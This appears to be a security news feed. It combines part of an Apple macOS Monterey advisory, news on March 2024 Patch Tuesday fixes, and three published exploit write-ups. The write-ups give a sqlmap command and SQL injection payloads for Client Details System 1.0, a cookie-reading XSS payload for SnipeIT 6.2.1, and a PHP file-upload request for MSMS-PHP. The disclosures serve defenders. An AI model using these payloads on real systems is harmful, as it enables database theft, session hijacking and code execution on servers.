CVE-2024-23264: Meysam Firouzi @R00tkitsmm working with Trend Micro Zero  
Day Initiative

Notes  
Available for: macOS Monterey  
Impact: An app may be able to access user-sensitive data  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2024-23283

PackageKit  
Available for: macOS Monterey  
Impact: An app may be able to elevate privileges  
Description: An injection issue was addressed with improved input  
validation.  
CVE-2024-23274: Bohdan Stasiuk (@Bohdan_Stasiuk)  
CVE-2024-23268: Mickey Jin (@patch1t), and Pedro Tôrres (@t0rr3sp3dr0)

PackageKit  
Available for: macOS Monterey  
Impact: An app may be able to access protected user data  
Description: A race condition was addressed with additional validation.  
CVE-2024-23275: Mickey Jin (@patch1t)

PackageKit  
Available for: macOS Monterey  
Impact: An app may be able to bypass certain Privacy preferences  
Description: The issue was addressed with improved checks.  
CVE-2024-23267: Mickey Jin (@patch1t)

PackageKit  
Available for: macOS Monterey  
Impact: An app may be able to overwrite arbitrary files  
Description: A path handling issue was addressed with improved  
validation.  
CVE-2024-23216: Pedro Tôrres (@t0rr3sp3dr0)

SharedFileList  
Available for: macOS Monterey  
Impact: An app may be able to access sensitive user data  
Description: This issue was addressed with improved file handling.  
CVE-2024-23230: Mickey Jin (@patch1t)

Shortcuts  
Available for: macOS Monterey  
Impact: A shortcut may be able to use sensitive data with certain  
actions without prompting the user  
Description: The issue was addressed with additional permissions checks.  
CVE-2024-23204: Jubaer Alnazi (@h33tjubaer)

Shortcuts  
Available for: macOS Monterey  
Impact: Third-party shortcuts may use a legacy action from Automator to  
send events to apps without user consent  
Description: This issue was addressed by adding an additional prompt for  
user consent.  
CVE-2024-23245: an anonymous researcher

Storage Services  
Available for: macOS Monterey  
Impact: A user may gain access to protected parts of the file system  
Description: A logic issue was addressed with improved checks.  
CVE-2024-23272: Mickey Jin (@patch1t)

macOS Monterey 12.7.4 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmXqccMACgkQX+5d1TXa  
IvoRPw//aOvhmfw+nqXXgAMv5Ptm8/G29gC7vtiS6WVFJsmUEQA5aM5P8KYRT1VP  
UtxDS0ShqKze958tIsiGpOshP7jildMmv52VKLG3HIV8XTTgiSBmO7ODPheGQaaG  
wgUkoZbue7VRSr9UZEm8qbLPdJpCUIbSWJImRbE6k4+Ap1IqRsYVv01gLN9+Ohhw  
tv6ObXbqeKI7EjRcfxqAG/SdehWg2azogMsdrq+wfpaEZG+Fy6B2NPu8AOcKICRQ  
to8JKPWMvtoGjbns5r8OPd9O29z3icsIB8b3qfQZHTc5i/eWi++VoAhLR2lEq8Ts  
hUPbOyf1AU4BeFKCC2MI060lOwK1WE4LRvD/CWv0g02b+yW9lXQ5xTah4+ycYaEp  
vXbxtlp7Da8s0XTDACFVvfMMN7fi3NIBSjwtz6YnqN6cxVnV/re69UYwuT44aJ4s  
UA5NElkhe7NZJ1+QQ5mSws19+PjP7TZpdeaPxxQfr6JN2Mi0a52tCaCmF0gIZHJj  
/HyjQzJHb40w5e4Vqw2r4GxvgZvjmUiW4pvPXgKD+6Ykp+g4lhHldSSFnDakjSy3  
OUM2idhKAHeHdFSm6UEv4ehhJM660DbDRujaZPpVuSKpcqKS79vcjs/gD/EGt/uG  
rhwMQd321+WzaKcGxu0gbAVRMzAtP/yxMEovCU2zFfh3AxbopDg=  
=KbmJ  
-----END PGP SIGNATURE-----

Apple Security Advisory 03-07-2024-4

Client Details System version 1.0 suffers from a remote SQL injection vulnerability.

    + **Exploit Title:** CVE-2023-7137_Client_Details_System-SQL_Injection_1+ **Date:** 2023-26-12+ **Exploit Author:** Hamdi Sevben+ **Vendor Homepage:** https://code-projects.org/client-details-system-in-php-with-source-code/+ **Software Link:** https://download-media.code-projects.org/2020/01/CLIENT_DETAILS_SYSTEM_IN_PHP_WITH_SOURCE_CODE.zip+ **Version:** 1.0+ **Tested on:** Windows 10 Pro + PHP 8.1.6, Apache 2.4.53+ **CVE:** CVE-2023-7137## References: + **CVE-2023-7137:** https://vuldb.com/?id.249140+ https://www.cve.org/CVERecord?id=CVE-2023-7137+ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7137+ https://nvd.nist.gov/vuln/detail/CVE-2023-7137## Description:Client Details System 1.0 allows SQL Injection via parameter 'uemail' in "/clientdetails/". Exploiting this issue could allow an attacker to compromise the application, access or modify data,  or exploit latest vulnerabilities in the underlying database.## Proof of Concept:+ Go to the User Login page: "http://localhost/clientdetails/"+ Fill email and password.+ Intercept the request via Burp Suite and send to Repeater.+ Copy and paste the request to a "r.txt" file.+ Captured Burp request:```POST /clientdetails/ HTTP/1.1Host: localhostAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-us,en;q=0.5Cache-Control: no-cacheContent-Length: 317Content-Type: application/x-www-form-urlencodedReferer: http://localhost/clientdetails/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36uemail=user@mail.com&login=LOG+IN&password=P@ass123```+ Use sqlmap to exploit. In sqlmap, use 'uemail' parameter to dump the database. ```python sqlmap.py -r r.txt -p uemail --risk 3 --level 5 --threads 1 --random-agent tamper=between,randomcase --proxy="http://127.0.0.1:8080" --dbms mysql --batch --current-db``````---Parameter: uemail (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: uemail=user@mail.com' OR NOT 6660=6660-- FlRf&login=LOG IN&password=P@ass123    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: uemail=user@mail.com' AND (SELECT 6854 FROM(SELECT COUNT(*),CONCAT(0x717a717a71,(SELECT (ELT(6854=6854,1))),0x7176627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Oxlo&login=LOG IN&password=P@ass123    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: uemail=user@mail.com' AND (SELECT 5335 FROM (SELECT(SLEEP(5)))qsPA)-- pwtE&login=LOG IN&password=P@ass123    Type: UNION query    Title: Generic UNION query (NULL) - 7 columns    Payload: uemail=user@mail.com' UNION ALL SELECT NULL,CONCAT(0x717a717a71,0x45575259495444506f48756469467471555975554d6f794d77677a4f50547145735052567278434f,0x7176627871),NULL,NULL,NULL,NULL,NULL-- -&login=LOG IN&password=P@ass123---[14:58:11] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.4.53, PHP, PHP 8.1.6back-end DBMS: MySQL >= 5.0 (MariaDB fork)[14:58:11] [INFO] fetching current databasecurrent database: 'loginsystem'```+ current database: `loginsystem`![1](https://github.com/h4md153v63n/CVEs/assets/5091265/bfbec122-5b56-42df-beda-41dfdcaf527a)

Client Details System 1.0 SQL Injection

Microsoft patched 61 vulnerabilities in the March 2024 Patch Tuesday round, including two critical flaws in Hyper-V.

The March 2024 Patch Tuesday update includes patches for 61 Microsoft vulnerabilities. Only two of the vulnerabilities are rated critical and both of these are found in Windows Hyper-V.

Hyper-V is a hardware virtualization product that allows you to run multiple operating systems as virtual machines (VMs) on Windows. A virtual machine is a computer program that emulates a physical computer. A physical “host” computer can run multiple separate “guest” VMs that are isolated from each other, and from the host. The physical resources of the host are allocated to the VMs by a software layer called the hypervisor, which acts an intermediary between the host and guests.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The Hyper-V CVEs patched in this round of updates are:

CVE-2024-21407 is a Windows Hyper-V Remote Code Execution (RCE) vulnerability with a CVSS score of 8.1 out of 10. Microsoft says exploitation is less likely since this vulnerability would require an authenticated attacker on a guest to send specially crafted file operation requests to hardware resources on the VM which could result in remote code execution on the host server.

This means the attacker would need a good deal of information about the specific environment, and to take additional actions prior to exploitation to prepare the target environment.

CVE-2024-21408 is a Windows Hyper-V Denial of Service (DOS) vulnerability with a CVSS score of 5.5 out of 10. This means an attacker could target a host machine from a guest and cause it to crash or stop functioning. However, Microsoft did not provide any additional details on how this DOS could occur.

The attention for Hyper-V is remarkable since only a week earlier, VMware released security updates to fix critical sandbox escape vulnerabilities in VMware ESXi, Workstation, Fusion, and Cloud Foundation. VMware ESXi and Hyper-V are both designed to handle large-scale virtualization deployments.

Another vulnerability worth mentioning is CVE-2024-21334, which has a CVSS score of 9.8 out of 10. It’s an Open Management Infrastructure (OMI) RCE vulnerability that affects System Center Operations Manager (SCOM). SCOM is a set of tools in Microsoft’s System Center for infrastructure monitoring and application performance management. A remote, unauthenticated attacker could exploit this vulnerability by accessing the OMI instance from the internet and sending specially crafted requests to trigger a use-after-free vulnerability.

OMI is an open source technology for environment management software products for Linux and Unix-based systems. The OMI project was set up to implement standards-based management so that every device in the world can be managed in a clear, consistent, and coherent way.

Use-after-free vulnerabilities are the result of the incorrect use of dynamic memory during a program’s operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker can exploit the error to manipulate the program. Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code.

Microsoft states that if the Linux machines do not need network listening, OMI incoming ports can be disabled. In other cases, customers running affected versions of SCOM (System Center Operations Manager 2019 and 2022) should update to OMI version 1.8.1-0.

**Other vendors**

Other vendors have synchronized their periodic updates with Microsoft. Here are few major ones that you may find in your environment.

**Adobe** has released security updates to address vulnerabilities in several products:

*   Adobe Experience Manager
*   Adobe Premiere Pro
*   Adobe ColdFusion
*   Adobe Bridge
*   Adobe Lightroom
*   Adobe Animate

The **Android** Security Bulletin for February contains details of security vulnerabilities for patch level 2024-03-05 or later.

**Apple** has released a security update for iOS and iPadOS to patch two zero-day vulnerabilities

**SAP** has released its March 2024 Patch Day updates.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using ThreatDown Vulnerability and Patch Management.

 Microsoft Patch Tuesday March 2024 includes critical Hyper-V flaws 

SnipeIT version 6.2.1 suffers from a persistent cross site scripting vulnerability.

    Exploit Title: SnipeIT 6.2.1 - Stored Cross Site ScriptingDate: 06-Oct-2023Exploit Author: Shahzaib Ali KhanVendor Homepage: https://snipeitapp.comSoftware Link: https://github.com/snipe/snipe-it/releases/tag/v6.2.1Version: 6.2.1Tested on: Windows 11 22H2 and Ubuntu 20.04CVE: CVE-2023-5452Description: SnipeIT 6.2.1 is affected by a stored cross-site scripting(XSS) feature that allows attackers to execute JavaScript commands. Thelocation endpoint was vulnerable.Steps to Reproduce:1. Login as a standard user [non-admin] > Asset page > List All2. Click to open any asset > Edit Asset3. Create new location and add the payload:<script>alert(document.cookie)</script>4. Now login to any other non-admin or admin > Asset page > List All5. Open the same asset of which you can change the location and the payloadwill get executed.POC Request:POST /api/v1/locations HTTP/1.1Host: localhostContent-Length: 118Accept: */*X-CSRF-TOKEN: CDJkvGNWzFKFueeNx0AQMJIhhXJGZmKG1SFeVEGVX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/117.0.5938.63 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://localhostReferer: http://localhost/hardware/196/editAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: snipeit_session=AHw3ARN6pdg90xU4ovG1FBZywycKPLIxjTUfmELO;assetsListingTable.bs.table.cardView=false; laravel_token=eyJpdiI6IitpM1RXVEVEVGNLZzRTd28wYmhZblE9PSIsInZhbHVlIjoickJocmNYTzNOS3JYdkdhSmpJME1GRmJYMi9DUnVkaStDTzBnbHZDVG1xNVAvbTA5cjJHM1FTbi95SEVzNmNnNzdKNHY5em5pK3ZjQ2F3VnB6RnhJRCs4NkV6NW16RnRWb3M0cXBuT2ZpZExoQ3JrN1VIVHB3cWV5NUtBRWZ4OXBsdEx4R0hSeElLV1BEbWk2WGxiWEBOMDg5cGFySj1rSnENckx3bXg2Qi9KQzFvNGJJTktjTVUw0EI4YVNMd2UxdW1TelBDV1ByUk9yeTFOUDR1cS9SV2tFRi9LOG1iZGVweUxJdGhHTXRLSnFvTU82QVIvREphS215bkRtKzM5M1RVQ21nVENsT1M1Mn1FUT1TbFkOVDVPbHd4a3BFQW1YQkY3NFR2bzRQSGZIelppa001MGYvSmFrbXVGWHpV0FMiLCJtYWMi0iJjZjMwMmQ4ZTB1NmM4MDU5YzU4MTYzZTgxNTcx0WEwYmM2Y2EyMmRlYzZhMmE2ZjI1NzIxYjc4NmIxNjRiOWM5IiwidGFnIjoiIn0%3D;XSRF-TOKEN=eyJpdiI6IjNmMVpNUEpDNCtpV0pHKOczZDRSUmc9PSIsInZhbHVlIjoiWXYvZkY2bTk4MONsUUFZQjZiVWtPdm1JRE1WWmpBd2tsZWNJblgxZWg3dONYL2x0Zkxib3N5Y1N5YmRYVm1XUm91N3pES1F1bHFWMEV1Y2xsZ1VqZ1FYdmdYcjJRZXZMZG9NYmpWY2htL2tPdXNBQUdEbjVHSEVjV2tzKOpYelEiLCJtYWMi0iI1YzhkNmQ2NDAxNmZkYTQ1NzVhZmI5OGY3ODA3MDkOOTc4ZWVhYmMiZWIYMjZhZGZiZWI5MjMOMGJjZDBkNzU4IiwidGFnIjoiIn0%3DConnection: closename=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&city=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&country=Thanks,Shahzaib Ali Khan

SnipeIT 6.2.1 Cross Site Scripting

MSMS-PHP version 1.0 suffers from a remote shell upload vulnerability.

    ## Title: MSMS-PHP (by: oretnom23 ) v1.0 File Upload - RCE browser using## Author: nu11secur1ty## Date: 03/13/2024## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html## Reference: https://portswigger.net/web-security/file-upload## Description:The upload function and id=cimg parameter are not sanitizing correctly!The attacker can upload any PHP file which he can execute directly onthe server!STATUS: HIGH-CrITICAL Vulnerability[+]Payload:```POSTPOST /mobile_store/classes/SystemSettings.php?f=update_settings HTTP/1.1Host: localhostContent-Length: 6318sec-ch-ua: "Not(A:Brand";v="24", "Chromium";v="122"Accept: application/json, text/javascript, */*; q=0.01Content-Type: multipart/form-data;boundary=----WebKitFormBoundarypV7nBYU4nAonvWelX-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112Safari/537.36sec-ch-ua-platform: "Windows"Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/mobile_store/admin/?page=system_infoAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=b6i4kegv7jonjlu44gtuo8i4dgConnection: close------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="name"Mobile Store Management System - PHP------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="short_name"MSMS-PHP------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="about_us"<p style="text-align: center; margin-right: 0px; margin-bottom: 0px;margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size:70px; line-height: 90px;">About Us</p><hr style="margin: 0px; padding:0px; clear: both; border-top: 0px; height: 1px; background-image:linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75),rgba(0, 0, 0, 0));"><div id="Content" style="margin: 0px; padding:0px; position: relative;"><div id="bannerL" style="margin: 0px 0px 0px-160px; padding: 0px; position: sticky; top: 20px; width: 160px;height: 10px; float: left; text-align: right; color: rgb(0, 0, 0);font-family: "Open Sans", Arial, sans-serif; font-size: 14px;background-color: rgb(255, 255, 255);"></div><div id="bannerR"style="margin: 0px -160px 0px 0px; padding: 0px; position: sticky;top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0,0); font-family: "Open Sans", Arial, sans-serif; font-size: 14px;background-color: rgb(255, 255, 255);"></div><div class="boxed"style="margin: 10px 28.7969px; padding: 0px; clear: both; color:rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif; font-size:14px; text-align: center; background-color: rgb(255, 255, 255);"><divid="lipsum" style="margin: 0px; padding: 0px; text-align:justify;"></div></div></div><p style="margin-right: 0px;margin-bottom: 15px; margin-left: 0px; padding: 0px;">Lorem ipsumdolor sit amet, consectetur adipiscing elit. Nullam non ultricestortor. Sed at ligula non lectus tempor bibendum a nec ante. Maecenasiaculis vitae nisi eu dictum. Duis sit amet enim arcu. Etiam blanditvulputate magna, non lobortis velit pharetra vel. Morbi sollicitudinlorem sed augue suscipit, eu commodo tortor vulputate. Interdum etmalesuada fames ac ante ipsum primis in faucibus. Pellentesquehabitant morbi tristique senectus et netus et malesuada fames acturpis egestas. Praesent eleifend interdum est, at gravida eratmolestie in. Vestibulum et consectetur dui, ac luctus arcu. Curabituret viverra elit. Cras ac eleifend ipsum, ac suscipit leo. Vivamusporttitor ac risus eu ultricies. Morbi malesuada mi vel luctussagittis. Ut vestibulum porttitor est, id rutrum libero. Mauris atlacus vehicula, aliquam purus quis, pharetra lorem.</p><pstyle="margin-right: 0px; margin-bottom: 15px; margin-left: 0px;padding: 0px;">Proin consectetur massa ut quam molestie porta. Donecsit amet ligula odio. Class aptent taciti sociosqu ad litora torquentper conubia nostra, per inceptos himenaeos. Morbi ex sapien, pulvinarac arcu at, luctus scelerisque nibh. In dolor velit, pellentesque eublandit a, mollis ac neque. Fusce tortor lectus, aliquam et eleifendid, aliquet ut libero. Nunc scelerisque vulputate turpis quisvolutpat. Vivamus malesuada sem in dapibus aliquam. Vestibulumimperdiet, nulla vitae pharetra pretium, magna felis placerat libero,quis tincidunt felis diam nec nisi. Sed scelerisque ullamcorpercursus. Suspendisse posuere, velit nec rhoncus cursus, urna sapienconsectetur est, et lacinia odio leo nec massa. Nam vitae nunc vitaetortor vestibulum consequat ac quis risus. Sed finibus pharetra orci,id vehicula tellus eleifend sit amet.</p><p style="margin-right: 0px;margin-bottom: 15px; margin-left: 0px; padding: 0px;">Morbi id antevel velit mollis egestas. Suspendisse pretium sem urna, vitae placeratturpis cursus faucibus. Ut dignissim molestie blandit. Phaselluspulvinar, eros id ultricies mollis, lectus velit viverra mi, atvenenatis velit purus id nisi. Duis eu massa lorem. Curabitur sed nibhfelis. Donec faucibus, nulla at faucibus blandit, mi justo efficiturdui, non mattis nisl purus non lacus. Maecenas vel congue tellus, inconvallis nisi. Curabitur faucibus interdum massa, eu facilisis ligulapretium quis. Nunc eleifend orci nec volutpat tincidunt.</p><pstyle="margin-right: 0px; margin-bottom: 15px; margin-left: 0px;padding: 0px;">Ut et urna sapien. Nulla lacinia sagittis felis idcursus. Etiam eget lacus quis enim aliquet dignissim. Nulla vel elitultrices, venenatis quam sed, rutrum magna. Pellentesque ultricies nonlorem hendrerit vestibulum. Maecenas lacinia pharetra nisi, atpharetra nunc placerat nec. Maecenas luctus dolor in leo malesuada,vel aliquet metus sollicitudin. Curabitur sed pellentesque sem, intincidunt mi. Aliquam sodales aliquam felis, eget tristique felisdictum at. Proin leo nisi, malesuada vel ex eu, dictum pellentesquemauris. Quisque sit amet varius augue.</p><p style="margin-right: 0px;margin-bottom: 15px; margin-left: 0px; padding: 0px;">Sed quisimperdiet est. Donec lobortis tortor id neque tempus, vel faucibuslorem mollis. Fusce ut sollicitudin risus. Aliquam iaculis tristiquenunc vel feugiat. Sed quis nulla non dui ornare porttitor eu vitaenisi. Curabitur at quam ut libero convallis mattis vel eget mauris.Vivamus vitae lectus ligula. Nulla facilisi. Vivamus tristique maximusnulla, vel mollis felis blandit posuere. Curabitur mi risus, rutrumnon magna at, molestie gravida magna. Aenean neque sapien, volutpat aullamcorper nec, iaculis quis est.</p>------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="privacy_policy"<p>Sample Privacy Policy<br></p>------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="files"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="img"; filename="info.php"Content-Type: application/octet-stream<?php  phpinfo();?>------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="cover"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWelContent-Disposition: form-data; name="banners[]"; filename=""Content-Type: application/octet-stream------WebKitFormBoundarypV7nBYU4nAonvWel--```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/MSMS-PHP(by%3Aoretnom23)v1.0/FU)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/msms-php-by-oretnom23-v10-file-upload.html)## Time spent:00:05:00

MSMS-PHP 1.0 Shell Upload

Apple and Microsoft recently released software updates to fix dozens of security holes in their operating systems. Microsoft today patched at least 60 vulnerabilities in its Windows OS. Meanwhile, Apple's new macOS Sonoma addresses at least 68 security weaknesses, and its latest updates for iOS fixes two zero-day flaws.

**Apple** and **Microsoft** recently released software updates to fix dozens of security holes in their operating systems. Microsoft today patched at least 60 vulnerabilities in its **Windows OS**. Meanwhile, Apple’s new **macOS Sonoma** addresses at least 68 security weaknesses, and its latest update for iOS fixes two zero-day flaws.

Last week, Apple pushed out an urgent software update to its flagship iOS platform, warning that there were at least two zero-day exploits for vulnerabilities being used in the wild (CVE-2024-23225 and CVE-2024-23296). The security updates are available in **iOS 17.4**, **iPadOS 17.4**, and **iOS 16.7.6**.

Apple’s **macOS** **Sonoma 14.4 Security Update** addresses dozens of security issues. **Jason Kitka**, chief information security officer at **Automox**, said the vulnerabilities patched in this update often stem from memory safety issues, a concern that has led to a broader industry conversation about the adoption of memory-safe programming languages \[full disclosure: Automox is an advertiser on this site\].

On Feb. 26, 2024, the Biden administration issued a report that calls for greater adoption of memory-safe programming languages. On Mar. 4, 2024, Google published Secure by Design, which lays out the company’s perspective on memory safety risks.

Mercifully, there do not appear to be any zero-day threats hounding Windows users this month (at least not yet). **Satnam Narang**, senior staff research engineer at **Tenable**, notes that of the 60 CVEs in this month’s Patch Tuesday release, only six are considered “more likely to be exploited” according to Microsoft.

Those more likely to be exploited bugs are mostly “elevation of privilege vulnerabilities” including CVE-2024-26182 (Windows Kernel), CVE-2024-26170 (Windows Composite Image File System (CimFS), CVE-2024-21437 (Windows Graphics Component), and CVE-2024-21433 (Windows Print Spooler).

Narang highlighted CVE-2024-21390 as a particularly interesting vulnerability in this month’s Patch Tuesday release, which is an elevation of privilege flaw in **Microsoft Authenticator**, the software giant’s app for multi-factor authentication. Narang said a prerequisite for an attacker to exploit this flaw is to already have a presence on the device either through malware or a malicious application.

“If a victim has closed and re-opened the Microsoft Authenticator app, an attacker could obtain multi-factor authentication codes and modify or delete accounts from the app,” Narang said. “Having access to a target device is bad enough as they can monitor keystrokes, steal data and redirect users to phishing websites, but if the goal is to remain stealth, they could maintain this access and steal multi-factor authentication codes in order to login to sensitive accounts, steal data or hijack the accounts altogether by changing passwords and replacing the multi-factor authentication device, effectively locking the user out of their accounts.”

CVE-2024-21334 earned a CVSS (danger) score of 9.8 (10 is the worst), and it concerns a weakness in **Open Management Infrastructure** (OMI), a Linux-based cloud infrastructure in **Microsoft Azure**. Microsoft says attackers could connect to OMI instances over the Internet without authentication, and then send specially crafted data packets to gain remote code execution on the host device.

CVE-2024-21435 is a CVSS 8.8 vulnerability in Windows OLE, which acts as a kind of backbone for a great deal of communication between applications that people use every day on Windows, said **Ben McCarthy,** lead cybersecurity engineer at **Immersive Labs**.

“With this vulnerability, there is an exploit that allows remote code execution, the attacker needs to trick a user into opening a document, this document will exploit the OLE engine to download a malicious DLL to gain code execution on the system,” Breen explained. “The attack complexity has been described as low meaning there is less of a barrier to entry for attackers.”

A full list of the vulnerabilities addressed by Microsoft this month is available at the SANS Internet Storm Center, which breaks down the updates by severity and urgency.

Finally, Adobe today issued security updates that fix dozens of security holes in a wide range of products, including **Adobe Experience Manager**, **Adobe Premiere Pro**, **ColdFusion 2023** and **2021**, **Adobe Bridge**, **Lightroom**, and **Adobe Animate**. Adobe said it is not aware of active exploitation against any of the flaws.

By the way, Adobe recently enrolled all of its **Acrobat** users into a “new generative AI feature” that scans the contents of your PDFs so that its new “AI Assistant” can  “understand your questions and provide responses based on the content of your PDF file.” Adobe provides instructions on how to disable the AI features and opt out here.

Tag

#apple